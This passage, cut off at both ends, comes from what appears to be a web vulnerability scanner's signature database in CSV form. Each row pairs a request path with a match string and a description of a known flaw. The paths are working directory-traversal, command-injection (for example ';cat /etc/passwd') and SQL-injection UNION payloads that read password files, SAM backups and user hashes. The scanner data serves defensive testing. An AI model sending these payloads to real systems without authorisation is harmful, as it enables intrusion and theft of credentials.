on the host.","","" "000530","0","5","/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini","GET","boot loader","","","","","The Web_Server_4D is vulnerable to a directory traversal problem.","","" "000531","17110","5","/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00","GET","\[boot loader\]","","","","","The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.","","" "000532","10424","5","@CGIDIRSSQLServ/sqlbrowse.asp?filepath=c:\&Opt=3","GET","boot\.ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","","" "000533","10420","5","@CGIDIRSstats/statsbrowse.asp?filepath=c:\&Opt=3","GET","boot\.ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","","" "000534","0","5","@CGIDIRStest.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" "000535","0","5","@CGIDIRStst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,","GET","boot\.ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","","" "000536","0","5","@CGIDIRSinput.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" "000537","0","5","@CGIDIRSinput2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" "000538","0","5","/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" "000539","0","5","/php/php.exe?c:\boot.ini","GET","boot loader","","","","","The Apache config allows php.exe to be called directly."," ","" "000540","0","5","/../../../../../../../../../boot.ini","GET","boot loader","","","","","The remote server allows any system file to be retrieved remotely.","","" "000541","0","5","/../../../../winnt/repair/sam._","GET","200","","","Forbidden","","Sam backup successfully retrieved.","","" "000542","0","5","/..\\..\\..\\..\\..\\..\\..\\boot.ini","GET","boot loader","","","","","It is possible to read files on the server by adding /../ in front of file name.","","" "000543","0","5","///etc/passwd","GET","root:","","","","","The server install allows reading of any system file by adding an extra '/' to the URL.","","" "000544","0","5","///etc/hosts","GET","200","","","","","The server install allows reading of any system file by adding an extra '/' to the URL.","","" "000545","0","5","////./../.../boot.ini","GET","boot loader","","","","","Server is vulnerable to directory traversal, this may be Lidik Webserver 0.7b from lysias.de. See http://www.it-checkpoint.net/advisory/14.html for details.","","" "000546","1269","5","/.cobalt/sysManage/../admin/.htaccess","GET","AuthName","","","","","Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory.","","" "000547","50624","5","/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd","GET","root:","","","","","Coppermine 1.0 RC3 may have been compromised to allow arbitrary file retreival. Upgrade to the latest at http://www.chezgreg.net/coppermine/","","" "000548","9028","5","/autohtml.php?op=modload&mainfile=x&name=/etc/passwd","GET","root:","","","","","php-proxima 6.0 and below allows arbitrary files to be retrieved.","","" "000549","49354","5","/atomicboard/index.php?location=../../../../../../../../../../etc/passwd","GET","root:","","","","","AtomicBoard v0.6.2 allows remote users to read arbitrary files.","","" "000550","54099","5","/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1","GET","root:","","","","","w-agora 4.1.5 allows any file to be retrieved from the remote host.","","" "000551","3012","5","/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","w-agora 4.1.5 allows any file to be retrieved from the remote host.","","" "000552","54058","5","/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00","GET","root:","","","","","Typo3 allows any file to be retrieved remotely. Upgrade to the latest version.","","" "000553","0","5","/DomainFiles/*//../../../../../../../../../../etc/passwd","GET","root:","","","","","Communigate Pro 4.0b to 4.0.2 allow any file to be retrieved from the remote system.","","" "000554","13302","5","/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini","GET","boot loader","","","","","Gafware's CFXImage allows remote users to view any file on the system.","","" "000555","59600","5","/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1","GET","root:","","","","","eZ httpbench version 1.1 allows any file on the remote server to be retrieved.","","" "000556","2870","5","/index.php?download=/winnt/win.ini","GET","\[fonts\]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","","" "000557","2870","5","/index.php?download=/windows/win.ini","GET","\[windows\]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","","" "000558","2870","5","/index.php?download=/etc/passwd","GET","root:","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","","" "000559","59085","5","/index.php?|=../../../../../../../../../etc/passwd","GET","root:","","","","","Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.","","" "000560","0","5","/index.php?page=../../../../../../../../../../etc/passwd","GET","root:","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)","","" "000561","0","5","/index.php?page=../../../../../../../../../../boot.ini","GET","boot loader","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)","","" "000562","59085","5","/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd","GET","root:","","","","","Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.","","" "000563","0","5","/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd","GET","root:","","","","","Default JRun CGI lets users read any system file.","","" "000564","0","5","/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini","GET","boot loader","","","","","Default JRun CGI lets users read any system file.","","" "000565","51750","5","/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor","GET","root:","","","","","Kebi Academy 2001 Web Solution allows any file to be retrieved from the remote system.","","" "000566","0","5","/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0","GET","root:","","","","","nCUBE Server Manage 1.0 allows any file to be read on the remote system.","","" "000567","0","5","/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0","GET","passwd","","","","","nCUBE Server Manage 1.0 allows directory listings of any location on the remote system.","","" "000568","0","5","/phprocketaddin/?page=../../../../../../../../../../boot.ini","GET","boot loader","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.","","" "000569","2829","5","/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd","GET","root:","","","","","phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.","","" "000570","2829","5","/phpwebfilemgr/index.php?f=../../../../../../../../../etc","GET","passwd","","","","","phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.","","" "000571","0","5","/phptonuke.php?filnavn=/etc/passwd","GET","root:","","","","","Photonouke or myphpnuke allows arbitrary files to be retrieved from the remote host.","","" "000572","0","5","/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd","GET","root:","","","","","NCR's Terradata server contains a CGI that allows any file to be retrieved remotely.","","" "000573","521","5","/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The ROADS search.pl allows attackers to retrieve system files.","","" "000574","0","5","/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read files on the host.","","" "000575","0","5","/viewpage.php?file=/etc/passwd","GET","root:","","","","","PHP-Nuke script viewpage.php allows any file to be retrieved from the remote system.","","" "000576","431","5","/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html","GET","root:","","","","","eXtropia's Web Store lets attackers read any file on the system by appending a %00.html to the name.","","" "000577","9055","5","/webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif","GET","boot loader","","","","","Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/","","" "000578","9055","5","/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif","GET","root:","","","","","Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/","","" "000579","14345","5","@CGIDIRSadmin.cgi?list=../../../../../../../../../../etc/passwd","GET","root:","","","","","Add2it Mailman Free V1.73 allows arbitrary files to be retrieved.","","" "000580","0","5","@CGIDIRS14all.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000581","0","5","@CGIDIRS14all-1.1.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000582","533","5","@CGIDIRSanacondaclip.pl?template=../../../../../../../../../../etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files from the server.","","" "000583","0","5","@CGIDIRSauktion.cgi?menue=../../../../../../../../../../etc/passwd","GET","root:","","","","","The CGI allows attackers to read arbitrary files remotely.","","" "000584","0","5","@CGIDIRSbigconf.cgi?command=view_textfile&file=/etc/passwd&filters=","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","","" "000585","0","5","@CGIDIRSbb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions of BigBrother 1.4h or older allow attackers to read arbitrary files on the system.","","" "000586","0","5","@CGIDIRSbb-hist?HISTFILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files.","","" "000587","0","5","@CGIDIRSbb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files.","","" "000588","0","5","@CGIDIRScommon.php?f=0&ForumLang=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read files on the host.","","" "000589","0","5","@CGIDIRScommerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","","" "000590","0","5","@CGIDIRScgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","","" "000591","0","5","@CGIDIRScal_make.pl?p0=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","","" "000592","0","5","@CGIDIRSdb4web_c/dbdirname//etc/passwd","GET","root:","","","","","The passwd file was retrieved by using the db4web executable.","","" "000593","563","5","@CGIDIRSdirectorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","","" "000594","5161","5","@CGIDIRSemumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000595","5161","5","@CGIDIRSemumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000596","5161","5","@CGIDIRSemu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000597","0","5","@CGIDIRSfaxsurvey?cat%20/etc/passwd","GET","root:","","","","","This CGI allows attackers to execute commands and read files remotely.","","" "000598","699","5","@CGIDIRSfaqmanager.cgi?toc=/etc/passwd%00","GET","root:","","","","","FAQmanager allows arbitrary files to be read on the host. Upgrade to latest version: http://www.fourteenminutes.com/code/faqmanager/","","" "000599","4969","5","@CGIDIRSezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1","GET","200","","","","","EZShopper search CGI allows arbitrary files to be read","","" "000600","0","5","@CGIDIRSformmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","","" "000601","0","5","@CGIDIRSformmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","","" "000602","603","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1","GET","\[fonts\]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","","" "000603","603","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1","GET","\[windows\]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","","" "000604","603","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1","GET","root:","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","","" "000605","0","5","@CGIDIRShtmlscript?../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000606","0","5","@CGIDIRShtgrep?file=index.html&hdr=/etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000607","0","5","@CGIDIRShsx.cgi?show=../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000608","0","5","@CGIDIRSsewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd","GET","root:","","","","","Default scripts can allow arbitrary access to the host.","","" "000609","2511","5","@CGIDIRSsbcgi/sitebuilder.cgi","GET","200","","","","","SITEBUILDER v1.4 may allow retrieval of any file. With a valid username and password, request: //sbcgi/sitebuilder.cgi?username=&password=&selectedpage=../../../../../../../../../../etc/passwd","","" "000610","0","5","@CGIDIRSmrtg.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000611","0","5","@CGIDIRSmrtg.cfg?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000612","0","5","@CGIDIRSmain.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","","" "000613","8192","5","@CGIDIRSmail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00","GET","root:","","","","","MailReader.com v2.3.31 web package allows remote users to retrieve any system file.","","" "000614","5161","5","@CGIDIRSmail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000615","0","5","@CGIDIRSloadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET","\[windows\]","","","","","This CGI allows attackers to read arbitrary files on the host.","","" "000616","0","5","@CGIDIRSloadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","","" "000617","89","5","@CGIDIRShtsearch?exclude=%60/etc/passwd%60","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000618","0","5","@CGIDIRSshop.cgi?page=../../../../../../../etc/passwd","GET","root:","","","","","Remote file read retrieval.","","" "000619","0","5","@CGIDIRSsendtemp.pl?templ=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000620","0","5","@CGIDIRSsearch/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc","GET","resolv\.conf","","","","","It is possible to read files on the remote server, this CGI should be removed.","","" "000621","521","5","@CGIDIRSsearch.pl?form=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The ROADS search.pl allows attackers to retrieve system files.","","" "000622","0","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET","\[fonts\]","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000623","0","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","GET","\[windows\]","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000624","0","5","@CGIDIRSquickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the remote system.","","" "000625","0","5","@CGIDIRSpublisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10","GET","root:","","","","","AHG's search.cgi allows any command to be executed. www.ahg.com.","","" "000626","0","5","@CGIDIRSphp.cgi?/etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files on the system and perhaps execute commands.","","" "000627","0","5","@CGIDIRSpals-cgi?palsAction=restart&documentName=/etc/passwd","GET","root:","","","","","This CGI allows remote users to read system files.","","" "000628","0","5","@CGIDIRSopendir.php?/etc/passwd","GET","root:","","","","","This CGI allows attackers to read any file on the web server.","","" "000629","5161","5","@CGIDIRSnph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000630","483","5","@CGIDIRSnewsdesk.cgi?t=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to view arbitrary files on the server.","","" "000631","393","5","@CGIDIRSnetauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to view arbitrary files on the server.","","" "000632","415","5","@CGIDIRSmultihtml.pl?multi=/etc/passwd%00html","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host. May also allow a shell to be spawned using http://www.packetstormsecurity.org/0009-exploits/multihtml.c","","" "000633","235","5","@CGIDIRSwebdist.cgi?distloc=;cat%20/etc/passwd","GET","root:","","","","","This CGI allows attackers to read files remotely.","","" "000634","506","5","@CGIDIRSway-board/way-board.cgi?db=/etc/passwd%00","GET","root:","","","","","Allows attackers to read arbitrary files from the server.","","" "000635","506","5","@CGIDIRSway-board.cgi?db=/etc/passwd%00","GET","root:","","","","","Allows attackers to read arbitrary files from the server.","","" "000637","0","5","@CGIDIRSviewsource?/etc/passwd","GET","root:","","","","","Allows attacker to retrieve arbitrary files. Remove from CGI directory.","","" "000638","0","5","@CGIDIRSttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd","GET","root:","","","","","Tarantell TTAWeb Top CGI lets remote users read arbitrary files.","","" "000639","0","5","@CGIDIRStraffic.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000640","0","5","@CGIDIRStechnote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","","" "000641","7715","5","@CGIDIRStalkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1","GET","200","","","","","Talkback CGI displays arbitrary files","","" "000642","683","5","@CGIDIRSstory/story.pl?next=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","story.pl versions older than 1.4 allow any file to be read remotely.","","" "000643","683","5","@CGIDIRSstory.pl?next=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","story.pl versions older than 1.4 allow any file to be read remotely.","","" "000644","0","5","@CGIDIRSstore/index.cgi?page=../../../../../../../../etc/passwd","GET","root:","","","","","CommerceSQL allows reading of arbitrary files. Default login/pass is username/password.","","" "000645","0","5","@CGIDIRSstore.cgi?StartID=../../../../../../../../../../etc/passwd%00.html","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","","" "000646","0","5","@CGIDIRSssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","GET","root:","","","","","The server install allows reading of any system file by sending encoded '../' directives.","","" "000647","265","5","@CGIDIRSsojourn.cgi?cat=../../../../../../../../../../etc/password%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files.","","" "000648","0","5","@CGIDIRSsimple/view_page?mv_arg=|cat%20/etc/passwd|","GET","root:","","","","","This CGI allows attackers to execute commands on the host as the HTTP daemon owner.","","" "000649","432","5","@CGIDIRSshopper.cgi?newpage=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1 and 2 of Byte's Interactive Web Shopper allow attackers to read files remotely. Uncomment the #$debug=1 variable.","","" "000650","17110","5","/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.","","" "000651","0","5","/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd","GET","root:","","","","","Webcalendar 0.9.41 and below allow remote users to read arbitrary files.","","" "000652","15392","5","/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|","GET","root:","","","","","Wordit Limited 2000 allows command execution.","","" "000653","0","5","@CGIDIRSsawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1","GET","root:","","","","","Remote file retrieval.","","" "000654","59084","5","/page.cgi?../../../../../../../../../../etc/passwd","GET","root:","","","","","WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval.","","" "000655","56290","5","/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd","GET","root:","","","","","EditTag allows arbitrary file retrieval.","","" "000656","8983","5","/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1","GET","root:","","","","","Remote file retrieval.","","" "000659","693","5","@CGIDIRSzml.cgi?file=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","Ztreet Markup Language interpreter allows arbitrary files to be read remotely.","","" "000660","0","5","@CGIDIRSYaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI lets users read any file with http daemon's permissions. Upgrade to latest version","","" "000661","242","5","@CGIDIRSwhois_raw.cgi?fqdn=%0Acat%20/etc/passwd","GET","root:","","","","","Allows attacker to view any file (and possibly execute commands). Upgrade to latest version","","" "000662","0","5","@CGIDIRSwhois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd","GET","root:","","","","","The whois.cgi allows any command to be executed on the system.","","" "000663","0","5","@CGIDIRSwhois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd","GET","root:","","","","","The whois.cgi allows any command to be executed on the system.","","" "000664","512","5","@CGIDIRSwebspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files.","","" "000665","0","5","@CGIDIRSwebplus?script=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to retrieve files remotely.","","" "000666","0","5","@CGIDIRSwebmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000667","16861","8","/athenareg.php?pass=%20;cat%20/etc/passwd","GET","root:","","","","","Athena web registration remote command execution.","","" "000668","278","7","/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd","GET","root:","","","","","This default Netscape file allows an attacker to read arbitrary files on the host.","","" "000669","0","5","/search?NS-query-pat=../../../../../../../../../../etc/passwd","GET","root:","","","","","The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+","","" "000670","0","5","/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini","GET","boot loader","","","","","The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+","","" "000671","0","7","/..\..\..\..\..\..\temp\temp.class","GET","200","","","","","Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.","","" "000672","0","7","/../../../../../../../../../../etc/passwd","GET","root:","","","","","It is possible to read files on the server by adding ../ in front of file name.","","" "000673","0","7","/.../.../.../.../.../.../.../.../.../boot.ini","GET","boot loader","","","","","Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?","","" "000674","0","7","/................../etc/passwd","GET","root:","","","","","The web server allows the password file to be retrieved.","","" "000675","0","3","/%3f.jsp","GET","[Ii]ndex [Oo]f ","","","","","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL.","","" "000677","388","7","/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini","GET","\[windows\]","","","","","Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher.","","" "000678","0","7","/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","GET","root:","","","","","Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org).","","" "000679","0","3","/%00","GET","File Name","","","","","Appending /%00 to a request to the web server may reveal a directory listing.","","" "000680","0","7","/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini","GET","\[windows\]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","","" "000681","0","7","/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd","GET","root:","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","","" "000682","0","7","/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini","GET","\[fonts\]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","","" "000683","728","9","/admentor/adminadmin.asp","GET","200","","","","","Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =","","" "000684","36894","9","@POSTNUKEMy_eGallery/public/displayCategory.php","GET","200","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.","","" "000685","0","9","@CGIDIRSclassifieds/index.cgi","GET","200","","","","","My Classifieds pre 2.12 is vulnerable to SQL injection attacks.","","" "000686","10105","9","/imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x","GET","parse error","","","","","IMP 2.x allows SQL injection, and reveals system information.","","" "000687","9392","9","/userinfo.php?uid=1;","GET","Query","","","","","Xoops portal gives detailed error messages including SQL syntax and may allow an exploit.","","" "000688","0","9","/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html","GET","root:","","","","","IBM Informix Web DataBlade allows remote execution of SQL","","" "000689","0","9","/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html","GET","root:","","","","","Web DataBlade 4.12/Informix is vulnerable to SQL injection.","","" "000690","0","9","/postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","\(\.\+\?\)","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","","" "000691","0","9","/postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","\(\.\+\?\)","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","","" "000692","0","8","@CGIDIRSalibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,","GET","boot\.ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","","" "000693","0","9","/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=","GET","DB Error: syntax error","","","","","phpWebSite 0.9.x and below are vulnerable to SQL injection.","","" "000694","2875","9","/phpBB2/search.php?search_id=1\\","GET","SQL Error","","","","","phpBB 2.06 search.php is vulnerable to SQL injection attack. Error page also includes full path to search.php file.","","" "000695","0","9","/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","\(\.\+\?\)","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","","" "000696","10107","9","/author.asp","GET","200","","","","","May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.","","" "000697","0","4","/horde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","","" "000698","0","4","/imp/horde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","","" "000699","0","4","@CGIDIRShorde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are 